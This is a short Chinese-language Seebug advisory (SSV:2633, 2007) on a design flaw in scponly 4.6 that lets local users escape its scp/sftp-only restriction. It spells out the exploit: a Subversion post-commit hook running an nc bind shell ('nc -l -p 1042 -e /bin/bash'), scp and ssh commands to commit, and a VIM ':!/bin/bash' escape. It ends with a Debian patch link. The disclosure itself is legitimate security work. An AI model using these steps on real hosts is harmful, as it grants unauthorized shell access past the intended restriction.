scponly本地任意命令执行漏洞

2007-12-18T00:00:00
ID SSV:2633
Type seebug
Reporter Root
Modified 2007-12-18T00:00:00

Description

scponly是一款可替代shell系统,可提供帐户在不需要shell访问的情况下进行scp和sftp操作。 scponly存在设计错误,本地攻击者可以利用漏洞绕过安全限制,执行任意命令。 通过本地建立一个使用包含( nc -l -p 1042 -e /bin/bash) &命令的/tmp/blubb/hooks/post-commit的/tmp/blubb subversion库,使用scp -r /tmp/blubb/ user@host:拷贝这个库。然后远程检查库:ssh user@host /usr/bin/svn co file:///home/user/blubb bla。通过增加一个文件并提交: touch blah scp blah user@host:bla/ ssh user@host /usr/bin/svn ci bla 这时候运行一个VIM实例,询问提交信息,然后就可以通过运行: :!/bin/bash 获得一个SHELL,写部分数据后使用:x退出,然后执行nc host 1042获得一个SHELL。

scponly 4.6 scponly scponly 4.6 Debian scponly_4.6-1.1.diff.gz <a href=http://ftp.us.debian.org/debian/pool/main/s/scponly/scponly_4.6-1.1.diff.gz target=_blank>http://ftp.us.debian.org/debian/pool/main/s/scponly/scponly_4.6-1.1.diff.gz</a>